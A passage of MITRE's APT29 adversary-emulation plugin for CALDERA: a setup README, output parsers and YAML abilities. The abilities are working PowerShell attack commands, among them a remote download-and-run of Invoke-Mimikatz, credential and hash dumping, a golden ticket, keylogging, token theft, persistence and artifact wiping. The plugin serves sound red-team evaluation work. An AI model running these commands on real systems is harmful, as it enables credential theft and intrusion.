warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/README.md: -------------------------------------------------------------------------------- 1 | # CALDERA plugin: evals 2 | 3 | ## Overview 4 | 5 | This repository contains the evals plugin for [CALDERA](https://github.com/mitre/caldera/wiki). 
6 | This [plugin](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-a-plugin) contains the TTPs used within the ATT&CK Evaluations round 2 (APT29) and round 1 (APT3). 7 | For more information, please see the [evaluations website](https://attackevals.mitre-engenuity.org/about). 8 | 9 | **Please read this README.md in its entirety to avoid missing crucial steps when executing an adversary.** 10 | 11 | ## Initial CALDERA Installation 12 | 1. Clone CALDERA 2.6.6 13 | ``` 14 | git clone https://github.com/mitre/caldera.git --recursive --branch 2.6.6 && cd caldera && sudo ./install.sh 15 | ``` 16 | 17 | 2. Clone the Eval plugin into the caldera/plugins directory 18 | ```commandline 19 | git clone https://github.com/mitre-attack/attack-arsenal.git && cp -R attack-arsenal/adversary_emulation/APT29/CALDERA_DIY/evals caldera/plugins/ && cd caldera 20 | ``` 21 | 22 | 3. Add the eval plugin to CALDERA config `conf/local.yml` 23 | ```yaml 24 | plugins: 25 | - evals 26 | ``` 27 | 28 | ## Round 2 Adversary 29 | The APT29 adversary is broken up into three separate CALDERA [adversaries](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-an-adversary) that execute commands in different phases. 30 | Under the operation panel you will see these phases listed as **APT29 - Day 1.A**, **APT29 - Day 1.B**, and **APT29 - Day 2**. 31 | Leverage the appropriate CALDERA [SANDCAT](https://caldera.readthedocs.io/en/latest/Plugin-library.html?highlight=sandcat#sandcat-54ndc47) [groups](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-a-group) for each operational phase. 32 | Prior to running an [operation](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-an-operation), please consult the environment setup steps below. 
33 | 34 | ### Environment Setup - Evals Round 2 - APT29 35 | Consult the [ATT&CK EVALUATION's Environment](https://attackevals.mitre-engenuity.org/APT3/environment) web page for a reference guide on how to replicate the range environment. 36 | Ensure that all A/V is disabled within the environment to successfully replicate the EVALS environment. 37 | 38 | - On your day 2 initial host you will need to manually browse to ```C:\Windows\Temp``` via ```Windows Explorer``` and accept the prompt. 39 | 40 | Requirements for the round 2 adversary are the following: 41 | - Initial host exists within a Windows domain. 42 | - Install Google Chrome on the target. 43 | 44 | - OneDrive account for data exfil. 45 | - *Failing to setup a OneDrive account will result only in an exfiltration ability failing, but the entire plugin can still run.* 46 |
47 | 48 | - Disabling A/V products on host. 49 | - *Failing to disable A/V products on the host will likely result in payloads being removed before abilities are executed.* 50 | 51 | **It is recommended that you first execute the evals plugin in an isolated-test environment to fully understand the TTPs performed on hosts, as well as the artifacts left behind.** 52 | 53 | #### Setting Up CALDERA Facts 54 | Next, update the [CALDERA facts](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-a-fact) now located in ```/caldera/plugins/evals/data/sources/4fb34bde-b06d-445a-a146-8e35f79ce546.yml``` 55 | with the appropriate values for your environment. Several of these values are stored in plaintext, so restrict read access to this file accordingly. Keys to update include: 56 | 57 | * Update ```target.domain.name``` to your environment's domain name. 58 | * Update ```target.winrm.username``` to an administrator account you will later laterally move to. 59 | * Update ```target.winrm.password``` to the administrator's password used by ```target.winrm.username``` (**THIS WILL BE STORED IN PLAINTEXT**). 60 | * Update ```target.winrm.remote_host``` to the remote host with winrm enabled for lateral movement. 61 | * Update ```pivot_machine_hostname``` to the hostname of a Windows host for lateral movement via psexec. 62 | * Update ```profile_user``` as the initial user the first SANDCAT agent will be spawning under. 63 | * Update ```profile_user_password``` to ```profile_user```'s password (**THIS WILL BE STORED IN PLAINTEXT**). 64 | * Update ```profile_user_day2``` to another user within the domain. 65 | * Update ```profile_user_password_day2``` to ```profile_user_day2```'s password (**THIS WILL BE STORED IN PLAINTEXT**). 66 | * Update ```onedrive.url``` to a OneDrive URL. 67 | * Update ```onedrive.username``` to a OneDrive account that will be used for data exfiltration. 68 | * Update ```onedrive.password``` to the ```onedrive.username```'s password (**THIS WILL BE STORED IN PLAINTEXT**). 
69 | 70 | 71 | #### Setting Up the CALDERA Server 72 | After initially cloning the CALDERA server, modify the ```conf/default.yml``` and set the CALDERA server's IP and port. 73 | 74 | * ```vim ./conf/default.yml``` 75 | 76 | *Note, this is a relative path from the plugin's location.* 77 | 78 | #### Setting Up Payloads 79 | Prior to executing any of the commands listed below, certain payloads must be configured with your CALDERA server's IP address and port. 80 | To accomplish this, use the ```setup.py``` Python script located in the payloads directory of the evals plugin to dynamically 81 | update the payloads to the appropriate IP and port. 82 | 83 | * ```cd plugins/evals/ && python3 ./payloads/setup.py``` 84 | 85 | 86 | ### Starting CALDERA 87 | Activate the Python virtual environment created by `install.sh`. 88 | 89 | * ```cd ../../ && source ./calderaenv/bin/activate``` 90 | 91 | Start a fresh instance of CALDERA. 92 | 93 | * ```python3 server.py --fresh``` 94 | 95 | ### EVALs Round 2 - APT 29 Operation Steps 96 | The APT29 [adversary profile](https://caldera.readthedocs.io/en/latest/Learning-the-terminology.html#what-is-an-adversary) is broken down into three separate adversary profiles. 97 | These profiles include **APT29 Day-1 A**, **APT29 Day-1 B - Lateral Movement**, and **APT29 Day-2**. 98 | To successfully replicate the ATT&CK evals process, an environment setup like the one outlined in the environment setup section is assumed. 99 | 100 | #### APT29 Day 1.A 101 | Perform the following steps to get started with the APT29 adversary profiles: 102 | 103 | 1. Start a SANDCAT agent with elevated privileges. To do so, copy the SANDCAT cradle from the agent’s tab 104 | and execute in an elevated user’s PowerShell prompt. 
105 | 106 | ![img-0](./imgs/0-caldera.png) 107 | 108 | ![img-1](./imgs/1-caldera.png) 109 | 110 | ![img-2](./imgs/2-caldera.png) 111 | 112 | ![img-3](./imgs/3-caldera.png) 113 | 114 | Before hitting "enter" within the PowerShell prompt, you should change the default group from **"red"** to something more descriptive 115 | such as **"red-day-1-A"**. See the image below. 116 | 117 | ![img-4](./imgs/4-caldera.png) 118 | 119 | At this point, you should then see an agent call back to your CALDERA server, which is visible under the "**agents**" tab. 120 | ![img-5](./imgs/5-caldera.png) 121 | 122 | ![img-6](./imgs/6-caldera.png) 123 | 124 | 2. Now that we have an agent, we can run an operation. Select "**APT29 Day-1 A**" from the operation page. 125 | ![img-7](./imgs/7-caldera.png) 126 | 127 | ![img-8](./imgs/8-caldera.png) 128 | 129 | 3. Start the APT29 Day-1 operation. 130 | 131 | --- 132 | 133 | #### APT29 Day 1.B - Lateral Movement 134 | Additional agents will spawn from the **APT29 Day-1 A** operation including a SANDCAT agent renamed as "python.exe". 135 | This will be the starting point for **APT29 Day-1 B**. To start **APT29 Day-1 B**, start another operation with the group the "python.exe" agent is in. 136 | Agent metadata can be viewed by clicking on the process id within the CALDERA interface. 137 | 138 | ![img-10](./imgs/10-caldera.png) 139 | 140 | ![img-11](./imgs/11-caldera.png) 141 | 142 | Now that we have verified the new agent exists, run a new operation using the **APT29 1.B - Lateral Movement** adversary profile. 143 | 144 | --- 145 | 146 | #### APT29 Day 2 147 | The APT29 Day-2 adversary profile expects a new agent to be run on a new machine as a non-elevated user. 148 | Copy the SANDCAT cradle as previously done and execute in a non-administrator PowerShell prompt. 149 | 150 | ![img-12](./imgs/12-caldera.png) 151 | 152 | After completing all adversary steps outlined above, RDPing into the target host should trigger additional persistence mechanisms. 
153 | 154 | ## Issues? 155 | Please consult the [common problems](https://caldera.readthedocs.io/en/latest/Common-problems.html) page on the CALDERA Read the Docs page. 156 | If you're still having issues, please open a git issue on the evals plugin page and follow the guidelines within ISSUES.md for reporting issues. 157 | 158 | ## Acknowledgements 159 | * [Microsoft Sysinternals](https://docs.microsoft.com/en-us/sysinternals/) 160 | * [Mimikatz](https://github.com/gentilkiwi/mimikatz) 161 | * [PoshC2](https://github.com/nettitude/PoshC2) 162 | * [PowerShell Empire](https://github.com/EmpireProject/Empire) 163 | * [PowerShell Mafia](https://github.com/PowerShellMafia) 164 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/gui_api.py: -------------------------------------------------------------------------------- 1 | from aiohttp_jinja2 import template 2 | 3 | from app.service.auth_svc import check_authorization 4 | from app.utility.base_world import BaseWorld 5 | 6 | class GuiApi(BaseWorld): 7 | 8 | def __init__(self, services): 9 | self.auth_svc = services.get('auth_svc') 10 | 11 | @check_authorization 12 | @template('evals.html') 13 | async def splash(self, request): 14 | return dict() 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/parsers/ntlm.py: -------------------------------------------------------------------------------- 1 | from app.objects.secondclass.c_relationship import Relationship 2 | from app.utility.base_parser import BaseParser 3 | import re 4 | 5 | 6 | class Parser(BaseParser): 7 | 8 | def __init__(self, parser_info): 9 | super().__init__(parser_info) 10 | self.mappers = parser_info['mappers'] 11 | self.used_facts = parser_info['used_facts'] 12 | 13 | def ntlm_parser(self, text): 14 | if text and len(text) > 0: 15 | value = re.search(r'\w{32}', text) 16 | if value: 17 | return 
[value.group(0)] 18 | 19 | def parse(self, blob): 20 | relationships = [] 21 | try: 22 | parse_data = self.ntlm_parser(blob) 23 | for match in parse_data: 24 | for mp in self.mappers: 25 | relationships.append( 26 | Relationship(source=(mp.source, match), 27 | edge=mp.edge, 28 | target=(mp.target, None) 29 | ) 30 | ) 31 | except Exception: 32 | pass 33 | return relationships 34 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/parsers/sessionid.py: -------------------------------------------------------------------------------- 1 | from app.objects.secondclass.c_relationship import Relationship 2 | from app.utility.base_parser import BaseParser 3 | import re 4 | 5 | 6 | class Parser(BaseParser): 7 | 8 | def __init__(self, parser_info): 9 | super().__init__(parser_info) 10 | self.mappers = parser_info['mappers'] 11 | self.used_facts = parser_info['used_facts'] 12 | 13 | def sessionid_parser(self, text): 14 | if text and len(text) > 0: 15 | value = re.search(r'\s\d', text) 16 | if value: 17 | return [value.group(0)] 18 | else: 19 | print("[!!!] 
Session id parser not found") 20 | 21 | def parse(self, blob): 22 | relationships = [] 23 | try: 24 | parse_data = self.sessionid_parser(blob) 25 | for match in parse_data: 26 | for mp in self.mappers: 27 | relationships.append( 28 | Relationship(source=(mp.source, match), 29 | edge=mp.edge, 30 | target=(mp.target, None) 31 | ) 32 | ) 33 | except Exception: 34 | pass 35 | return relationships 36 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/app/parsers/sid.py: -------------------------------------------------------------------------------- 1 | from app.objects.secondclass.c_relationship import Relationship 2 | from app.utility.base_parser import BaseParser 3 | import re 4 | 5 | 6 | class Parser(BaseParser): 7 | 8 | def __init__(self, parser_info): 9 | super().__init__(parser_info) 10 | self.mappers = parser_info['mappers'] 11 | self.used_facts = parser_info['used_facts'] 12 | 13 | def sid_parser(self, text): 14 | if text and len(text) > 0: 15 | value = re.search(r'S-(\d-?){1,34}', text) 16 | if value: 17 | return [value.group(0)[:-1]] 18 | else: 19 | print("[!] 
Error parsing SID") 20 | 21 | def parse(self, blob): 22 | relationships = [] 23 | try: 24 | parse_data = self.sid_parser(blob) 25 | for match in parse_data: 26 | for mp in self.mappers: 27 | relationships.append( 28 | Relationship(source=(mp.source, match), 29 | edge=mp.edge, 30 | target=(mp.target, None) 31 | ) 32 | ) 33 | except Exception: 34 | import pdb; pdb.set_trace() 35 | pass 36 | return relationships 37 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/0b1841bd-ef8b-475c-bce7-8fcb2860984a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a 4 | name: 8.D.1 - Screen Capture (T1113) 5 | description: Native API call(s) were used to collect a screenshot. 6 | tactic: collection 7 | technique: 8 | attack_id: T1113 9 | name: Screen Capture 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Import-Module .\Get-Screenshot.ps1 -Verbose -Force; 15 | Get-Screenshot; 16 | payload: Get-Screenshot.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/5692da31-3586-4e4f-8f07-5750070c730b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 5692da31-3586-4e4f-8f07-5750070c730b 3 | name: 2.A - Automated Collection (T1119) 4 | description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions. 
5 | tactic: collection 6 | technique: 7 | attack_id: T1119 8 | name: Automated Collection 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/a4b14c10-49aa-4ae4-b165-d5a37364fe62.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: a4b14c10-49aa-4ae4-b165-d5a37364fe62 3 | name: 7.A.0 - Staging files for PowerShell module imports 4 | description: Renaming psversion.txt to psversion.ps1 so it can be imported 5 | tactic: collection 6 | technique: 7 | attack_id: T1036 8 | name: Masquerading 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | 14 | if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { 15 | write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 20 | if (test-path -path ".\psversion.txt" ) { 21 | move-item .\psversion.txt psversion.ps1 -Force; 22 | } 23 | write-host "[+] File psversion.ps1 staged to be imported." 
24 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/a81ea4ad-bc9f-49a7-82d4-4466df641487.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: a81ea4ad-bc9f-49a7-82d4-4466df641487 4 | name: 7.A.1 - Screen Capturing 5 | description: Load custom PowerShell module and take screenshots. 6 | tactic: collection 7 | technique: 8 | attack_id: T1113 9 | name: Screen Capture 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { 15 | write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 20 | . .\psversion.ps1; 21 | Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c 4 | name: 17.A - Collect E-mails 5 | description: Perform e-mail collection from custom PowerShell module. 6 | tactic: collection 7 | technique: 8 | attack_id: T1114 9 | name: Email Collection 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . 
.\stepSeventeen_email.ps1; 15 | Write-Host "Emails Collected"; 16 | payload: stepSeventeen_email.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/db28f68d-e8b8-46e6-b680-642570d4b257.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: db28f68d-e8b8-46e6-b680-642570d4b257 3 | name: 7.A.3 - Automated Collection (T1119) - Input Capture (T1417) 4 | description: Load custom PowerShell module, and grab keystrokes for 15 seconds. 5 | tactic: collection 6 | technique: 7 | attack_id: T1417 8 | name: Input Capture 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 14 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 15 | exit 1; 16 | } 17 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 18 | . .\psversion.ps1; 19 | Get-Keystrokes; 20 | Start-Sleep -Seconds 15; 21 | View-Job -JobName "Keystrokes"; 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/ee4c2eab-be57-434c-a32c-14b77360301a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: ee4c2eab-be57-434c-a32c-14b77360301a 3 | name: 7.A.2 - Automated Collection (T1119) - Clipboard (T1115) 4 | description: Get contents of clipboard 5 | tactic: collection 6 | technique: 7 | attack_id: T1115 8 | name: Clipboard Data 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | $clip_data=get-clipboard; 14 | if ($clip_data.Length -gt 0) { 15 | write-host "[+] Clipboard data obtained!\n"; 16 | write-host $clip_data; 17 | } else { 18 | write-host "[!] 
No clipboard data available!\n"; 19 | } 20 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/collection/fc231955-774f-442c-ac0e-e74dfda50c5c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: fc231955-774f-442c-ac0e-e74dfda50c5c 4 | name: 17.B/C - Collect Files & Compress Collection 5 | description: Collect a specific document from a target machine. 6 | tactic: collection 7 | technique: 8 | attack_id: T1005 9 | name: Data from Local System 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | 15 | try{ 16 | if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { 17 | New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; 18 | } 19 | } catch { 20 | write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; 21 | exit 1; 22 | } 23 | 24 | if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { 25 | write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; 26 | exit 1; 27 | } 28 | Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; 29 | . .\stepSeventeen_zip.ps1; 30 | zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; 31 | if ($?) 
{ 32 | write-host "[+] Documents successfully staged for collection."; 33 | } 34 | 35 | payload: stepSeventeen_zip.ps1 36 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 3 | name: 14.C - Stage Mimikatz Binary 4 | description: Staging Mimikatz Binary for later execution 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1003 8 | name: Credential Dumping 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | write-host "[+] Successfully downloaded m.exe"; 14 | payload: m.exe 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/267bad86-3f06-49f1-9a3e-6522f2a61e7a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 267bad86-3f06-49f1-9a3e-6522f2a61e7a 3 | name: 20.A.1 - Execute Invoke-Mimikatz 4 | description: Perform Mimikatz credential collection 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1003 8 | name: Credential Dumping 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | klist purge; 14 | . 
.\Invoke-Mimikatz.ps1; 15 | invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; 16 | klist; 17 | invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; 18 | payload: Invoke-Mimikatz.ps1 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 4 | name: 14.B - Credential Dumping (T1003) 5 | description: Dumping credentials via wmidump (Mimikatz) 6 | tactic: credential-access 7 | technique: 8 | attack_id: T1003 9 | name: Credential Dumping 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepFourteen_credDump.ps1; 15 | payload: stepFourteen_credDump.ps1 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/c4f4b13c-87b6-498c-b814-93570173068c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: c4f4b13c-87b6-498c-b814-93570173068c 3 | name: 6.B.1 - Credentials In Files (T1081) - Private Keys Extraction 4 | description: Obtain credentials via Custom PowerShell 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1145 8 | name: Private Keys 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; 14 | 15 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 16 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. 
Execution has stopped."; 17 | exit 1; 18 | } 19 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 20 | . .\readme.ps1; 21 | Get-PrivateKeys; 22 | if ($? -eq $True) { 23 | write-host "[+] Successfully executed private key collection script."; 24 | exit 0; 25 | } else { 26 | write-host "[!] Error, could not execution Get-PrivateKeys."; 27 | exit 1; 28 | } 29 | payload: dmevals.local.pfx -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d 3 | name: 6.A - Credentials In Files (T1081) - Chrome 4 | description: Obtain credentials from Chrome Dumper 5 | tactic: credential-access 6 | technique: 7 | attack_id: T1003 8 | name: Credential Dumping 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 14 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 15 | exit 1; 16 | } 17 | 18 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 19 | ./accesschk.exe -accepteula .; 20 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: effbedc1-1bc8-4a75-9395-980559700008 4 | name: 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) 5 | description: Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS. 
6 | tactic: credential-access 7 | technique: 8 | attack_id: T1003 9 | name: Credential Dumping 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; 15 | $web = (New-Object System.Net.WebClient); 16 | $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); 17 | iex $result; 18 | function hashdump 19 | { 20 | Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" 21 | }; 22 | hashdump; 23 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/03afada1-1714-408f-bde5-f528b91dc89d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 03afada1-1714-408f-bde5-f528b91dc89d 4 | name: >- 5 | 5.B.1 - Access Token Manipulation (T1134), 6 | 6.A.1 - Query Registry (T1012), 7 | 7.B.1 - Remote File Copy (T1105), 8 | 7.C.1 - Scheduled Tasks (T1053), 9 | 8.A.1/2 - File and Directory Discovery (T1083) 10 | description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. 
11 | tactic: defensive-evasion 12 | technique: 13 | attack_id: T1134 14 | name: Access Token Manipulation (T1134) 15 | platforms: 16 | windows: 17 | psh,pwsh: 18 | command: | 19 | Import-Module .\StealToken.ps1 -Verbose -Force; 20 | StealToken; 21 | CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; 22 | CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; 23 | CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; 24 | CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; 25 | RevertToSelf; 26 | payload: StealToken.ps1,sandcat.go-windows 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/208b021b-c79a-4176-8ad1-3af99ed50c6f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 208b021b-c79a-4176-8ad1-3af99ed50c6f 3 | name: 9.C - Artifact Cleanup - Delete Staged Files 4 | description: Cleanup files related to Operation 5 | tactic: defensive-evasion 6 | technique: 7 | attack_id: T1107 8 | name: File Deletion 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | 14 | 15 | if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { 16 | mkdir "C:\Program Files\SysInternalsSuite"; 17 | } 18 | set-location "C:\Program Files\SysInternalsSuite"; 19 | 20 | if (!$(test-path -path "sdelete64.exe")) { 21 | iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; 22 | Expand-Archive sdelete64.zip -force; 23 | } 24 | copy sdelete64.exe C:\Windows\Temp\; 25 | cd C:\Windows\Temp\ ; 26 | .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; 27 | .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; 28 | 
.\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; 29 | remove-item C:\Windows\Temp\sdelete64.exe -force; 30 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 4 | name: 12.A Timestomp kxwn.lock 5 | description: Timestomp kxwn.lock 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1099 9 | name: Timestomp 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { 15 | write-host "[!] kxwn.lock was not found on this host."; 16 | exit 1; 17 | } else { 18 | . .\timestomp.ps1; 19 | timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; 20 | } 21 | payload: timestomp.ps1 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 3 | name: 10.A.3 - Artifact Cleanup 4 | description: Delete file artifacts left from the operation. 5 | tactic: defensive-evasion 6 | technique: 7 | attack_id: T1107 8 | name: File Deletion 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; 14 | Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; 15 | Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; 16 | if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { 17 | Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; 18 | } else { 19 | write-host "[!] 
